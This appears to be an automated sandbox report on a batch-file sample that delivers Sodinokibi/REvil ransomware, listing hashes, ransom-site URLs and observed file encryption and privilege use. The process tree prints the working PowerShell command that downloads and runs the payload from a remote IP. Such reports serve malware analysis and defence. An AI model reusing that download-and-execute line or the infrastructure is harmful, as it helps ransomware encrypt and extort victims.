Analysis
-
max time kernel
61s -
max time network
112s -
platform
windows10_x64 -
resource
win10 -
submitted
23-08-2020 00:10
Static task
static1
Behavioral task
behavioral1
Sample
25670aeb8c557614c06e34c5a9c253e5.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
25670aeb8c557614c06e34c5a9c253e5.bat
Resource
win10
General
-
Target
25670aeb8c557614c06e34c5a9c253e5.bat
-
Size
219B
-
MD5
c052ffa560e4de5251e2ea89d88526b5
-
SHA1
5f0a6636545f8107c02801a0a190a1a8c274b190
-
SHA256
5949574200b2d571b720bac31031f7a5b01d4224da05e5cd5064156972eba462
-
SHA512
f5f8fc051da52356820f62fd5088115bb5108d6cb37b2c13f0538816f84247f24d0188988407d8a9351ebd1ed5275a3c74daa49c6c6dcae02241b175a5a79f84
Malware Config
Extracted
http://185.103.242.78/pastes/25670aeb8c557614c06e34c5a9c253e5
Extracted
C:\429c34h-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5EBEAD0EEC4F7ACC
http://decryptor.cc/5EBEAD0EEC4F7ACC
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 3160 powershell.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\ClearExit.raw => \??\c:\users\admin\pictures\ClearExit.raw.429c34h powershell.exe File renamed C:\Users\Admin\Pictures\ConvertMove.png => \??\c:\users\admin\pictures\ConvertMove.png.429c34h powershell.exe File renamed C:\Users\Admin\Pictures\DisconnectFormat.png => \??\c:\users\admin\pictures\DisconnectFormat.png.429c34h powershell.exe File renamed C:\Users\Admin\Pictures\ReceiveEnter.png => \??\c:\users\admin\pictures\ReceiveEnter.png.429c34h powershell.exe File renamed C:\Users\Admin\Pictures\StepEnter.raw => \??\c:\users\admin\pictures\StepEnter.raw.429c34h powershell.exe File renamed C:\Users\Admin\Pictures\SaveSend.raw => \??\c:\users\admin\pictures\SaveSend.raw.429c34h powershell.exe File renamed C:\Users\Admin\Pictures\WaitRevoke.png => \??\c:\users\admin\pictures\WaitRevoke.png.429c34h powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\73z6480.bmp" powershell.exe -
Drops file in Program Files directory 12 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ConvertSend.M2V powershell.exe File opened for modification \??\c:\program files\ExitDebug.xps powershell.exe File opened for modification \??\c:\program files\FindUnblock.tif powershell.exe File opened for modification \??\c:\program files\OutTest.MTS powershell.exe File opened for modification \??\c:\program files\UninstallSplit.raw powershell.exe File opened for modification \??\c:\program files\UnregisterGrant.rm powershell.exe File opened for modification \??\c:\program files\UpdateRepair.inf powershell.exe File created \??\c:\program files\429c34h-readme.txt powershell.exe File created \??\c:\program files (x86)\429c34h-readme.txt powershell.exe File opened for modification \??\c:\program files\LimitOptimize.wps powershell.exe File opened for modification \??\c:\program files\ResizeReceive.wav powershell.exe File opened for modification \??\c:\program files\StartAdd.vdw powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 3160 powershell.exe 3160 powershell.exe 3160 powershell.exe 3160 powershell.exe 3160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3160 powershell.exe Token: SeDebugPrivilege 3160 powershell.exe Token: SeTakeOwnershipPrivilege 3160 powershell.exe Token: SeBackupPrivilege 3468 vssvc.exe Token: SeRestorePrivilege 3468 vssvc.exe Token: SeAuditPrivilege 3468 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3672 wrote to memory of 3160 3672 cmd.exe powershell.exe PID 3672 wrote to memory of 3160 3672 cmd.exe powershell.exe PID 3672 wrote to memory of 3160 3672 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\25670aeb8c557614c06e34c5a9c253e5.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/25670aeb8c557614c06e34c5a9c253e5');Invoke-AMKGYOMYBGBS;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3468